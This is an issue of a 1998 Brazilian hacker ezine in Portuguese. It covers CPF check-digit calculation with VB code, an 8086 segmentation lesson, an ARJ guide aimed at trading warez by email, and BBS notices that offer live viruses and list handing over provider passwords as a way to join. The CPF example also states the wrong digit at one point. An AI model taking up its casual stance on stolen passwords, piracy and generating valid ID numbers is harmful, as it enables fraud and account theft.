\ / | | |__ __ | | | ___ | | | ____ \ / | | _) | | | | | | | | \ / | | _/ | | | | ___ | | |____ / | | \ | | | | | | | | / |_ |_ \_ |_ |______ |_ |_ |______ |_ |______ [ v i r t u a l i s ] Ano 1 - Número 5 - Agosto/1998 Editor responsável - Dr Herman Versão digital __________________________________________________________________ | | | Temos UMA boca e DOIS ouvidos mas jamais nos comportamos | | proporcionalmente. | | Provérbio chinês | |__________________________________________________________________| Virtualis é uma publicação independente e gratuita. Tem como premissa que é melhor conhecer do que desconhecer, portanto, nenhuma tentativa é feita para esconder qualquer informação não importando quão perigosa seja. A informação é uma faca de dois gumes. Nem boa nem má, pode ser usada para o bem como o mal. ATENÇÃO: Algumas informações publicadas podem ser usadas para atividades criminosas. Não me responsabilizo pelo seu uso. Email: virtualis@cyberdude.com * endereço preferido virtual1s@geocities.com -> se eu por acaso "sumir" novamente (bate na madeira), prefira enviar mail para o seguinte endereço: virtualis@yahoo.com Envie cobranças, flames e afins para dev/null@cyberdude.com [ Como conseguir as próximas edições da Virtualis ] * Na Internet: Via browser, no endereços: http://www.geocities.com/SiliconValley/Sector/2935/ Ou pelos ponteiros (útil se algum dia a GeoCities tirar minha página do ar) http://move.to/virtualis/ http://www.virtualis-br.home.ml.org Via FTP anônimo, no endereço ftp://ftp.etext.org/pub/Zines/Virtualis/ Via e-mail Já é possível assinar o zine via e-mail. Receba as próximas edições diretamente em sua mail-box assinando a Virtualista. Para cadastrar-se, vá até http://www.geocities.com/SiliconValley/Sector/2935/ * Pelo correio: Serviço indefinidamente indisponível. Quem quiser abrigar o zine em sua página, por favor entre em contato comigo para que eu possa incluir a sua URL nas próximas edições. ___________________________________________________________________ / \ | ÍNDICE | \___________________________________________________________________/ | | | | | 1................................................Editorial | | | | 2......................................................ETC | | Assinaturas | | Presente do mês | | BBS | | | | 3.................................................ByteCode | | Como são calculados os dígitos verificadores do CPF | | Curso de Assembly - Lição 2 | | | | 4.......................................The Hackerz Philez | | ARJ - Seu uso no processo WAREZ via email | | Dicionário Virtualis | | Criptografia de Dados em Unix | | Senhas no Win95 | | Começando do começo: As BADCOMS | | Fábricas de vírus búlgaras e soviéticas | | dmsetup.exe (cavalo de tróia) | | | | 5...................................................Por aí | | | | 6....................................................Risus | | | | 7......................................................EOF | | | \_______________________________________________________________/ Colaboram com esta edição: NetRunner Pinei Ruger Skin ___________________________________________________________________ / \ | Editorial | \___________________________________________________________________/ Sinceramente, não era para vocês estarem lendo a V5 tão cedo. Ela só saiu devido a insistência e a colaboração de alguns leitores. Ainda bem, pois esta edição está bem legal. Escrevi um artigo interessante sobre CPF -- finalmente você poderá saber como é gerado este número cabalístico. Tem outro sobre ARJ que ensina como utilizá-lo como ferramenta na troca de softwares por email. Traduzi um excelente texto sobre a cultura virótica na Búlgaria. É meio velhinho mas muito bom. Tem também a seção "Por aí" -- este mês está bem recheada. Ainda falando sobre esta edição, o presente do mês é um programa chamado HEdit32. É um ótimo editor hexa para arquivos binários. Não sabe para que serve isso ?! Meu chapa, tu é novo no negócio ? Bom, para quem não sabe para o que serve, aguarde eu ou outra pessoa ter saco para escrever uma matéria. Leia mais sobre o HEdit nesta edição e talvez você descubra como usá-lo. Bem, parece que a Virtualis está deixando de ser um projeto de um homem só. Estou querendo dizer que acho que já tenho uma equipe. Veja o caso desta edição -- várias matérias foram enviadas por colaboradores. Acho que o pessoal está pegando o espírito da coisa. Estou tentando manter a periodicidade mensal do zine mas está difícil. Tendo uma equipe ficaria bem mais fácil, pois bastaria definir uma pauta, e cada um se encarregaria de fazer sua parte. Hoje, só posso contar comigo mesmo e alguns colaboradores mais assíduos. Terei menos tempo para dedicar a Virtualis. Agora em setembro começarei a dar algumas aulas de informática para levantar uma grana. Paralelamente, estarei preparando um CD-ROM com bastante coisa legal -- docz, vírus, warez, imagens (aquelas ...), entre outras coisas. Também estou bolando uma camiseta do zine. Espero que o pessoal dê aquela força. Fiquem ligados. Assim que tiver alguma coisa concreta, divulgo no site ou na virtualista (veja mais abaixo). Quanto a BBS, duas notícias. Uma boa e outra ruim. Primeiro a boa: Está saindo ! De verdade ! E agora a ruim: estará aberta apenas para colaboradores e membros do grupo. Por que ?! Bem, tenho apenas uma linha em casa e não acho legal eu disponibilizar meus arquivos "na faixa" para qualquer um. De repente, carinha que desce a lenha na Virtualis passa a acessar e pegar tudo quanto é coisa boa. Não ! A BBS será um instrumento de apoio ao grupo e ponto final. Quem estiver interesado, colabore ou aguarde até eu decida abri-la comercialmente (coisa pouco provável). Bom, chega de papo e boa leitura ! ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ¬ ¬ ¬ E T C ¬ ¬ ¬ ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ___________________________________________________________________ / \ | Assinaturas | \___________________________________________________________________/ Uma das coisas que sempre quis foi disponibilizar assinaturas da Virtualis via email. Quem está ligado no zine, já havia se cadastrado na lista criada na GetReminded. O serviço parecia bom a princípio, mas acabei descobrindo que não poderia utilizá-lo para distribuir a Virtualis. Mas nem tudo está perdido, encontrei um outro serviço -- Coollist -- este funciona. Aqueles que já tinham se cadastrado no GetReminded, já receberam uma mensagem que explicava como proceder para se cadastrar na nova lista. [ Para quem deseja se cadastrar na nova lista ] Para receber as próximas edições da Virtualis diretamente em sua mailbox, cadastre-se na virtualista. virtualista não é apenas uma lista de distribuição do zine -- é também uma lista de discussão. As inscrições podem ser feitas no site da Virtualis. Lá você deve fornecer seu endereço de email. Após algum tempo, você receberá um email da Coollist: -------------------------------------------------------------------- SUBJECT: Confirmation of Subscription We have recently been requested by you to subscribe to this List: Please confirm that you want to subscribe by replying to this message. If this subscription is unsolicited, simply delete this message. Thank you. -------------------------------------------------------------------- Para quem não entende inglês, a mensagem acima solicita a confirmação da sua assinatura. Para confirmar, basta dar um reply na mesma. ATENÇÃO: Para aqueles que acessam a Rede apenas por email (coisa difícil hoje) e desejam uma assinatura, mande um email para virtualis@cyberdude.com com o subject: ASSINATURA. Vai demorar um pouco para que eu faça o cadastro. Espero ter sido claro, somente quem não tem acesso completo a Rede, isto é, não acessa a Rede via browser (http), me peçam isso. [ O que é uma lista de discussão ? ] Uma lista de discussão é um poderoso meio de comunicação baseado em mensagens de email entre pessoas de um mesmo grupo. [ O que é a virtualista ? ] virtualista é uma lista de discussão não moderada, i.e., não existe filtragem nas mensagens enviadas por seus assinantes. Isso significa que se você enviar uma mensagem para virtualista@coollist.com, esta mensagem será distribuída automaticamente para *todos* os inscritos na mesma *sem* que seja necessário minha aprovação. Espero não ter que transformá-la numa lista moderada. Neste caso, todas as mensagens enviadas para lista, seriam desviadas para meu endereço. Daí, eu filtraria as mensagens e somente distribuiria as mensagens que realmente interessasem. [ Quais os assuntos que podem ser abordados na virtualista ? ] Assuntos relacionados com os temas abordados na Virtualis -- hacking, phreaking, virus, segurança, informática em geral, internet, sexo, ficção científica, programação, warez, conspirações, humor-hacker (piadas de informática), gamez, bugz, sistemas operacionais, etc. Todas as novidades colocadas no site serão notificadas através da virtualista. Eu, Dr Herman, como o dono da lista não permitirei abusos. Por isso, nem pense em enviar mensagens do tipo "COMO FICAR RICO", "TOTENS", etc. [ Como enviar uma mensagem para a lista ] Basta enviar o email para o endereço virtualista@coollist.com. Não se esqueça de colocar um "subject" bem descritivo. ___________________________________________________________________ / \ | Presente do mês | \___________________________________________________________________/ Este mês trago-lhes o HEdit32. Ele poderá ser baixado do site da Virtualis a partir do link PRE005. HEdit32 é um editor hexa para arquivos binários. Isto significa que ele pode ser usado para abrir qualquer arquivo binário e visualizar e editar seu conteúdo em hexa ou ASCII. Ele pode ser usado para encontrar uma série de bytes em arquivos. Diferente de editores de texto, HEdit32 não permite a inserção ou exclusão de bytes no meio do arquivo, deslocando o resto do arquivo. Tais operações são comuns em arquivos textos, onde a localização absoluta de um caractere não é crítica. Entretanto, arquivos binários, i.e., executáveis e arquivos de dados, geralmente se baseam num deslocamento particular de um byte no início do arquivo, e portanto, mexer em tais arquivos, os tornaria corrompidos. ___________________________________________________________________ / \ | BBS | \___________________________________________________________________/ [ Virtualis Computer Underground BBS - VCU BBS ] Estou iniciando as operações da BBS em caráter experimental. Nesta fase, ela estará aberta apenas para colaboradores do zine e membros do grupo Virtualis. Seu funcionamento será apenas no período da noite (22:00 às 6:00). [ O que será encontrado na VCU ] Arquivos e conferências relacionadas com o submundo da informática. - ezines - faqs - how-to's - warez - virus (vivos e codigo fonte) - imagens (sExUs) [ Como é a BSS ] Software gerenciador: PowerBoard ou Remote Access Número de linhas telefônicas: 1 Hardware: Pentium MMX 233 MHZ 32MB RAM HD 2.1GB modem 33600 bps Sistema Operacional: Rwin95 (*) Parâmetros para conexão: 8-N-1 Código de área: 011 - Grande São Paulo Como se tornar um membro Para se tornar um membro do grupo e consequentemente usuário da BBS, será necessário preencher alguns requisitos: - colaborar com o zine de alguma forma - escrevendo artigos, divulgando, fazendo a distribuição, etc. - fornecer alguma informação realmente quente, como senhas de algum provedor :) - fazendo uploads de alguns softwares que sejam de meu interesse. ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ¬ ¬ ¬ B y t e C o d e ¬ ¬ ¬ ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ___________________________________________________________________ / \ | Como são calculados os dígitos verificadores do CPF | \___________________________________________________________________/ Dr Herman Números de contas bancárias, números de cartões de crédito, RG, CPF e outros documentos tem um mecanismo verificador embutido neles mesmos. Assim, é possível saber se alguém está informando um número escolhido ao acaso ou mesmo se foi digitado um dígito errado. Isso é feito através de dígitos verificadores. Um dígito verificador é um número calculado em função dos dígitos anteriores. Vamos supor que exista um banco XYZ cujo o número das contas bancárias tenham o seguinte formato: xxxxx - d onde x é o número da conta d é o digíto verificador Para calcular o dígito verificador, é definida uma fórmula (geralmente esta fórmula não é muito simples). Para o exemplo, suponha que a fórmula seja a seguinte: d = resto da divisão de (SOMATÓRIO dos x) por 3 Exemplos: * Conta bancária 44123 - d temos: 4+4+1+2+3 = 14 / 3 = 4 resto 2 Portanto a conta é 44123 - 2. * Conta bancária 12664 - d temos: 1+2+6+6+4 = 19/3 = 6 resto 1 Portanto a conta é 12664 - 1. Bom, vamos logo ao que interessa -- o cálculo do número do CPF. Evitarei usar a linguagem matemática. Para o exemplo abaixo, suponha que o CPF seja 662 313 332 - XX * cálculo do primeiro dígito: - multiplica-se cada dígito por PESO, onde PESO vai de 10 até 2 - soma-se o resultado - divide-se o resultado desta soma por 11 - o que importa é o resto (portanto, não precisa fazer divisão decimal). Se o resto for menor que 2, então o primeiro dígito é 0. Senão, o primeiro dígito é 11 - RESTO , que neste caso é 11 - 10 = 1. Portanto, o primeiro dígito para este exemplo é 3. 6 x 10 = 60 6 x 9 = 54 2 x 8 = 16 3 x 7 = 21 1 x 6 = 6 3 x 5 = 15 3 x 4 = 12 3 x 3 = 9 2 x 2 = 4 --- 197 / 11 = 17 RESTO 10 Como o resto é maior que 2, o primeiro dígito é 11 - 10 = 1 O cálculo do segundo dígito depende do primeiro dígito verificador além dos outros 9 dígitos. * cálculo do segundo dígito: - multiplica-se cada dígito por PESO, onde PESO vai de 3 até 11 - soma-se o resultado incluíndo nesta soma o primeiro dígito multiplicado por 2; - divide-se o resultado desta soma por 11 - o que importa é o resto (portanto, não precisa fazer divisão decimal). Se o resto for menor que 2, então o segundo dígito é 0. Senão, o segundo dígito é 11 - RESTO, que neste caso é 11 - 8 = 3. Portanto, o primeiro dígito para este exemplo é 3. 6 x 11 = 66 6 x 10 = 60 2 x 9 = 18 3 x 8 = 24 1 x 7 = 7 3 x 6 = 18 3 x 5 = 15 3 x 4 = 12 2 x 3 = 6 2 <-- primeiro dígito multiplicado por 2 (1 x 2) --- 228 / 11 = 20 RESTO 8 11 - 8 = 3 Como 3 > 2 , o segundo dígito é 3. Portanto, os dígito verificadores do CPF 662.313.332 é 13. CPF = 662.313.332-13. Bom, o cálculo dos dígitos verificadores do CPF está desmistificado. Agora é só sair por aí soltando números de CPF totalmente válidos :) Aproveite e faça um teste utilizando o seu número de CPF. Para não ficar só nisso, como programador samaritano, fiz uma função em BASIC (VB). Esta rotina pode ser facilmente portada para outra linguagem. --------------------------------8<----------------------------------- Public Function calculaDV(sCPF As String) As String Dim i As Integer Dim iAcumulador As Integer Dim iDigito1 As Integer, iDigito2 As Integer iAcumulador = 0 For i = 2 To 10 iAcumulador = iAcumulador + (i * Val(Mid$(sCPF, 11 - i, 1))) Next i If iAcumulador Mod 11 < 2 Then iDigito1 = 0 Else iDigito1 = 11 - iAcumulador Mod 11 End If iAcumulador = iDigito1 * 2 For i = 3 To 11 iAcumulador = iAcumulador + (i * Val(Mid$(sCPF, 12 - i, 1))) Next i If iAcumulador Mod 11 < 2 Then iDigito2 = 0 Else iDigito2 = 11 - iAcumulador Mod 11 End If calculaDV = Trim$(Str$(iDigito1)) & Trim$(Str$(iDigito2)) End Function -------------------------------->8----------------------------------- ___________________________________________________________________ / \ | Curso de Assembly | | traduzido e adaptado do original de AESOFT | | por Dr Herman | | | \___________________________________________________________________/ Lição 2 Endereçamento no 8086 Segmentação Nesta lição vamos ver como é o endereçamento do 8086, isto é, como o 8086 acessa cada posição de memória. A maneira que a CPU contrõe os endereços de memória é muito importante para programação do sistema, devido ao fato de utilizarmos constantemente instruções de transferências de dados, de acesso a funções da BIOS, do DOS, etc Mais a frente, estudaremos a BIOS. Por enquanto, basta saber que é um conjunto de rotinas gravadas na ROM, que se encarregam de acessar a níveis mais baixos o hardware. Em outras palavras, estas rotinas se encarregam de manipular o hardware. BIOS é a sigla de Basic Input Output System (Sistema Básico de Entrada e Saída). Quanto ao DOS (Sistema Operacional de Disco), utilizaremos seus utilitários ou comandos. Veremos também, o que é uma interrupção. Antes de iniciarmos a lição propriamente dita, é bom conhecer um pouco de história. No princípio dos anos 80, a Intel (fabricante da família de processaores 80x86) se propôs a dar um grande passo a frente da concorrência. Naquele tempo, os microprocessadores presentes nos computadores domésticos eram de 8 bits. Isso quer dizer que o barramento de dados daqueles processadores era de 8 bits assim como o tamanho da palavra de memória e os registradores. Um claro exemplo é o Z80 (da empresa Zilog), que estava presente em máquinas famosas como Spectrum, Amstrad e MSX. Como disse anteriormente, a largura do barramento de dados era de 8 bits. Isto quer dizer que todas as transferências de dados que eram feitas se faziam de 8 e 8 bits, isto é, byte a byte. Pois bem, embora o microprocessador fosse de 8 bits, e a maioria dos registros também, havia um maior (16 bits). Estou me referindo sobretudo ao registro de endereçamento que era de 16 bits. Desta forma, um Amstrad CPC-464 podia acessar 64KB de memória. 64KB era o máximo que o Z80 podia endereçar. Naquele momento, a Intel planejava superar essa barreira de 64KB, mas tinha um problema. O Z80 por exemplo, tinha registros de 16 bits enquanto o processador era de 8 bits. Mas, passar de 16 bits de capacidade para os registros naquela época não era possível para os microprocessadores. Quero dizer que não havia tecnologia suficiente para conseguir isso. Sendo assim, era necessário buscar uma fórmula diferente... E aí é que surge a idéia de segmentos. A Intel teve a idéia de construir endereços de 20 bits de largura. Mas os registros eram de 16 bits e só havia uma solução possível para alcançar 20 bits -- usar 2 registros de 16 bits ! O 8086 divide a memória (1 MB) em segmentos, cada um tendo 64KB (o maior endereço que cabe num registro). Então, para endereçar uma posição de memória usaremos dois registros: o de segmento e o de offset (deslocamento). Já vimos na lição anterior que haviam vários registros de segmento: CS (registro de segmento de código), DS (de dados), etc. Pois bem, este primeiro registro (de segmento), indica onde começa o bloco de 64KB que buscamos. O segundo registro (de offset), contém o deslocamento dentro deste segmento. Bem. Vimos que são necessários 2 registros para direcionar esse MegaByte de memória, e temos um barramento de endereçamento de 20 bits. Isto nos leva a pensar que o microprocessador deve realizar operações sobre estes registros para obter o endereço físico de 20 bits. Isto se faz da seguinte maneira -- o 8086 move o valor do segmento em 4 bits para a esquerda e soma o valor do deslocamento para criar um endereço de 20 bits. Graficamente: Temos dois registros de 16 bits. DS: XXXXXXXXXXXXXXXX BX: XXXXXXXXXXXXXXXX 15 87 0 15 87 0 |------||------| |------||------| Byte alto Byte baixo Byte alto Byte baixo (mais significativo)(menos significativo) O primeiro registro, é o de segmento (neste caso, segmento DS, de dados). O segundo registro é o de offset ou deslocamento. Neste caso, utilizamos o registro BX para direcionar dentro do segmento. Podiamos fazer isso de outra forma, utilizando o registro SI, o DI, etc. A partir destes dois registros, devemos acessar a uma posição de memória física dentro do MegaByte que dispomos para o 8086. Supomos que o registro DS tem o valor 0B800h (hexadecimal -- utilize a calculadora do Rwindows para fazer as conversões de base -- hexa, binário e decimal). E o registro BX contém o valor 0037h. Temos em binário: DS: 1011100000000000 BX: 0000000000110111 Para obter o endereço físico de memória, e levando em conta tudo o que foi dito sobre segmentos, o processador faria assim: Graficamente: Faria uma soma da seguinte forma: DS: 1011100000000000 BX: + 0000000000110111 -------------------- 10111000000000110111 Obtendo assim o endereço de 20 bits necessário para cobrir todo o megabyte. Se este número (10111000000000110111) que está em binário, for convertido para hexa, teremos que o endereço físico correspondente é 0B8037h. Disso tudo, se deduz que os segmentos sempre são endereços divisíveis por 16. Mais tecnicamente: cada segmento começa em um endereço de parágrafo. Um parágrafo é o formado por 16 bytes. Supõem-se que nunca haverá um segmento que começe em um endereço ímpar, por exemplo. Como exemplo: o primeiro segmento possível começa no endereço físico 0. O segundo começa no endereço 16. Isto é mais complexo do que parece. Se está confuso, se dará conta que diferentes combinações de endereços segmentados podem dar num mesmo endereço físico. Também se pode dizer que os segmentos se podem sobrepor uns aos outros, podem ser idênticos, ou podem encontrar-se em partes totalmente distantes na memória. Se chegou a este ponto sem compreender o tema dos segmentos, não siga em frente -- você se perderá. Tente compreender, busque ajuda, quebre a cabeça, mas entenda. Por enquanto é isso. ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ¬ ¬ ¬ T h e H a c k e r z P h i l e z ¬ ¬ ¬ ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ___________________________________________________________________ / \ | ARJ - Seu uso no processo WAREZ via email | \___________________________________________________________________/ Dr Herman Já faz alguns anos que utilizo este poderoso compressor de arquivos. Na minha opinião, é o melhor de todos. Infelizmente não é tão popular quanto o ZIP. Acho que isso se deve talvez ao fato do ZIP ser mais antigo e ter sido popularizado em BBS (além de seu código fonte ser de domínio público). Hoje, devido as facilidades de uso do ambiente gráfico, o WinZip é praticamente imbátivel. Tudo bem, eu confesso que utilizo o WinZip. Utilizo para criar arquivos que não ocupem mais que um disco (1.44 MB). Para criar arquivos maiores (multi-volume) prefiro usar o ARJ. Com ele, basta digitar o comando para extração e ir trocando os discos conforme necessário. Com o ZIP, é um tal de colocar o primeiro volume, depois colocar o último, depois colocar o de número PI/r2 :) ... Bom, quem quiser coloborar com a seção Toolz do meu site ou mesmo "trocar algumas figurinhas" comigo, utilize o ARJ para "quebrar" arquivo grandes em arquivos menores (50KB por exemplo). Depois é só enviá-los anexados a várias mensagens de e-mail. Para quem não sabe como utilizar o ARJ, segue um pequeno guia. * * * ARJ é um programa que possibilita armazenar um ou vários arquivos em um arquivo de formato comprimido. Isso economiza espaço na compressão e em clusters. Em um disco, qualquer arquivo, independente do tamanho , ocupa um certo espaço em disco (2048 a 32768 bytes). Combinando 100 arquivos pequenos num arquivo ARJ pode economizar 200 Kbytes de espaço ou mais. Como usar: A linha de comando básica consiste de: 1) a palavra "ARJ" 2) letra de comando ARJ como "a" ("add" = adicionar) ou "e" ("extract" = extrair) 3) opções como "-r" ( "recurse subdirectories" = subdiretórios) 4) o nome do arquivo ARJ 5) o nome do diretório onde estão os arquivos (se necessário) 6) o nome dos arquivos selecionados ARJ [opções] [diretório\] [nome_dos_arquivos] legenda: <> argumento obrigatório [] argumento opcional As opções (-r, -jp, etc) podem ser colocadas em qualquer lugar na linha de comando após o comando "ARJ". O diretório é opcional e deve terminar com o símbolo "\". Se não for especificado nomes de arquivos, será considerado como *.*. CRIANDO ARQUIVOS ARJ: Para os exemplos abaixo, considere a seguinte estrutura de diretórios. c:\ | +-- herman\ | +-- virtualis\ | | | +-- colab\ | | | +-- apoio\ | . . . * Para criar um arquivo ARJ contendo todos os arquivos do diretório atual (ou corrente): ARJ a nome_do_arquivo_arj --> ex: arj a zines.arj ou arj a docz (repare que a extensão .arj é opcional) Nos exemplos acima serão criados os arquivos zines.arj e docz.arj no diretório atual. * Para criar um arquivo ARJ em outro diretório contendo todos os arquivos do diretório corrente: ARJ a herman\zines No exemplo acima, será criado um arquivo ARJ chamado zines.arj no diretório .\herman. Este arquivo contém todos os arquivos do diretório corrente. * Para criar um arquivo ARJ contendo todos os arquivos com a extensão ".txt" no diretório corrente: ARJ a virtualis *.txt --> gera o arquivo virtualis.arj * Para criar um arquivo ARJ contendo todos os arquivos com as extensões ".txt" e ".zip" no diretório corrente: ARJ a virtualis *.txt *.zip --> gera o arquivo virtualis.arj * Para criar um arquivo ARJ contendo todos os arquivos de num determinado diretório: ARJ a virtualis c:\virtualis\*.* --> gera o arquivo virtualis.arj no diretório corrente contendo todos os arquivos do diretório c:\virtualis\ * Para criar um arquivo ARJ contendo todos os arquivos de um diretório e todos os arquivos de seus subdiretórios: ARJ a -r virtualis c:\virtualis\*.* --> gera o arquivo virtualis.arj no diretório corrente contendo todos os arquivos do diretório c:\virtualis e seus subdiretórios (neste caso, colab\ e apoio\) * Para criar um arquivo contendo arquivos sem informação de path (caminho) ARJ a -e virtualis c:\virtualis\*.* --> idem ao exemplo anterior, só que neste caso, os arquivos incluídos no arquivo virtualis.arj não teriam a pathname completo. Para entender melhor, crie 2 arquivos .arj nos moldes dos 2 exemplos e depois utilize o comando l (veja mais abaixo) para visualizar o conteúdo dos mesmos. Este comando produz um arquivo ligeiramente menor que o comando anterior. Por default, o ARJ comprime os arquivos. Existe a opção de apenas armazenar os arquivos sem comprimi-los. Isso é interessante em casos em que desejamos "arjear" arquivos já comprimidos como os .ZIP, .JPG, etc. Pedir para o ARJ comprimir arquivos já comprimidos só nos tomaria tempo de processamento. * Para compressão máxima, use as opções "-jm" ou "-jm1". * Para maior velocidade, use a opção -m2. ARJ a -r -jm1 virtualis c:\virtualis\*.* ARJ a -r -m2 virtualis c:\virtualis\*.* * Para criar um arquivo ARJ contendo o pahtname completo dos arquivos INCLUÍNDO quaisquer especificações de DRIVE ou RAIZ ARJ a -r -jf virtualis C:\virtualis\*.* LISTANDO O CONTEÚDO DE UM ARQUIVO ARJ: * Para listar todos os arquivos de um arquivo ARJ: ARJ l arquivo_arj * Para listar todos os arquivos com pausas ao encher a tela: ARJ l arquivo_arj -jp * Para listar apenas arquivos com a extensão ".txt": ARJ l arquivo_arj *.txt Ao utilizar o comando l, último campo listado mostar "BTPMGVX" que significa: B -> arquivo não contido no último capítulo (arquivo obsoleto) T -> tipo texto/binário/diretório/capítulo/rótulo P -> informação de pathname disponível através de "listagem V" (?) M -> método de compressão usado G -> arquivo foi encriptado V -> arquivo continua no próximo volume X -> este arquivo é parte de uma arquivo maior EXTRAINDO ARQUIVOS: * Para extrair todos os arquivos no diretório corrente: ARJ e arquivo_arj * Para extrair todos os arquivos em um determinado diretório: ARJ e arquivo_arj c:\virtualis\ * Para extrair todos os arquivos com a extensão ".txt" no diretório corrente: ARJ e arquivo_arj *.txt * Para extrair todos os arquivos RECRIANDO a estrutura original de diretórios a partir do diretório corrente: ARJ x arquivo_arj * Para extrair todos os arquivos contendo pathnames absolutos para os paths originais: ARJ x -jf arquivo_arj TESTANDO A INTEGRIDADE DE UM ARQUIVO ARJ: * Para testar o conteúdo de um arquivo arj: ARJ t arquivo_arj Este comando verifica se o conteúdo de um arquivo arj "bate" com os arquivos originais. Isto é feito através do método CRC (Cylical Redundancy Checksumming). O ARJ usa uma CRC 32 bits para aumentar a confiabilidade dos arquivos produzidos. CRIANDO UM ARQUIVO ARJ AUTO-EXTRATIVO: Um arquivo auto-extrativo é um arquivo executável (.exe) contendo um arquivo ARJ. Este arquivo quando executado, irá extrair o seu conteúdo. O comando "ARJ y -je arquivo_arj" criará um arquivo auto-extrativo de um arquivo .arj. O comando "ARJ y -je1 arquivo_arj" criará uma arquivo auto- extrativo menor. Exemplo: ARJ y -je virtualis.arj --> gera o arquivo virtualis.exe CRIANDO E EXTRAINDO ARQUIVOS MULTI-VOLUME: Alguém já deve ter perguntado -- como é que faço para "arjear" um arquivo de 3MB para que ele caiba em vários disquetes ? Simples. Crie um arquivo ARJ multi-volume. Exemplos: ARJ a -v50K virtualis.arj *.txt --> gera volumes de 50KB ARJ a -v360 virtualis.arj *.txt --> gera volumes de 360KB ARJ a -v720 virtualis.arj *.txt --> gera volumes de 720KB ARJ a -v1200 virtualis.arj *.txt --> gera volumes de 1200KB ARJ a -v1440 virtualis.arj *.txt --> gera volumes de 1440KB Para extrair: ARJ e -v virtualis.arj --> extrair o arquivo multi-volume virtualis.arj no diretório corrente Quando se extrai arquivo(s) de um arquivo ARJ multi-volume, após um disquete ser lido, é pedido que se troque o disquete atual pelo próximo disquete (volume) e se confirme (y -- yes). No caso desta matéria, não estamos interessados em colocar arquivos em disquetes e sim distribuí-los por email. Como não é interessante enviar e nem receber arquivos muito grandes por email, podemos usar o ARJ para quebrá-los em várias partes. Para esse propósito, eu prefiro utilizar volumes de 50KB. Assim, supondo que tenho que enviar um arquivo de 450KB, uso o ARJ para gerar os volumes. Em seguida, envio cada volume "attachado" numa mensagem de email. Isso facilita bastante o processo de troca de software por email. Para quem não tem o ARJ, vou colocá-lo na seção Toolz do meu site. ___________________________________________________________________ / \ | Dicionário Virtualis | \___________________________________________________________________/ SkIn A ALIAS  SIGNIFICA SEGUNDO NOME OU APELIDO. PODE REFERENCIAR UM ENDEREÇO ELETRÔNICO ALTERNATIVO DE UMA PESSOA OU GRUPO DE PESSOAS, OU UM SEGUNDO NOME DE UMA MÁQUINA. É TAMBÉM UM DOS COMANDOS BÁSICOS DO UNIX. ASCII (AMERICAN STANDARD CODE FOR INFORMATION INTERCHANGE) UM PADRÃO PARA SALVAR INFORMAÇÕES. ACOPLADOR DIRECIONAL EQUIPAMENTO QUE DERIVA UM NÚMERO PRÉ-DETERMINADO DE SINAIS PARA UMA   OU MAIS SAÍDAS. B BBS (BULLETIN BOARD SYSTEM) É UM SISTEMA QUE TIPICAMENTE OFERECE SERVIÇOS DE CORREIO ELETRÔNICO, REPOSITÓRIO DE ARQUIVOS (DE PROGRAMAS, DADOS OU IMAGENS) E OUTROS SERVIÇOS COMO CONVERSAÇÃO ON-LINE. SEUS ASSINANTES TÊM ACESSO ATRAVÉS DE LINHAS TELEFÔNICAS UTILIZADAS VIA COMPUTADOR PESSOAL E MODEM. BROWSER O BROWSER É UM "NAVEGADOR" USADO PARA A EXTRAÇÃO DE INFORMAÇÕES EM UM SERVIDOR NO CIBERESPAÇO. TIPICAMENTE, UM BROWSER SERÁ UM  PROGRAMA PESSOAL QUE ACESSARÁ, ATRAVÉS DE LINHA TELEFÔNICA, UM SERVIDOR (ISTO É, UM PROGRAMA QUE ATENDE À DEMANDA DE CLIENTES  REMOTOS), CONTENDO INFORMAÇÕES DE INTERESSE AMPLO. SOFTWARE DE ACESSO À INTERNET. BPS É UMA MEDIDA DA TAXA DE TRANSFERÊNCIA REAL (VELOCIDADE DE  TRANSMISSÃO) DE DADOS DE UMA LINHA DE COMUNICAÇÃO, DADA EM BITS POR   SEGUNDO. BASIC (BEGINNER'S ALL-PURPOSE SYMBOLIC INSTRUCTION CODE) LINGUAGEM DE PROGRAMAÇÃO CRIADA EM 1964 POR JOHN KEMENY E THOMAS  KURTZ. BOOT PROCEDIMENTO BÁSICO EXECUTADO QUANDO SE LIGA OU SE REINICIA O  COMPUTADOR. TEM POR FUNÇÃO EXECUTAR O POST E ATIVAR O SISTEMA OPERACIONAL, TORNANDO-O FUNCIONAL. BIOS (BASIC INPUT/OUTPUT SYSTEM) INFORMAÇÕES ARMAZENADAS DENTRO DE UM CIRCUITO INTEGRADO, QUE DIZEM  AOS PROGRAMAS COMO O COMPUTADOR ESTÁ PROJETADO. TEM POR FUNÇÃO  ARMAZENAR CERTAS CONFIGURAÇÕES, COMO SISTEMA E SEQUÊNCIA DE BOOT, O POST, DATA E HORA, ETC ... GERENCIA A ENTRADA E SAÍDA DE INFORMAÇÕES. BACKBONE LINHA DE ALTA VELOCIDADE, ONDE SE CONECTAM OS PRINCIPAIS SERVIDORES DA INTERNET. NA REDE EXISTEM VÁRIOS BACKBONES. BACKUP (CÓPIA DE SEGURANÇA) ATO DE FAZER UMA CÓPIA RESERVA DOS DADOS 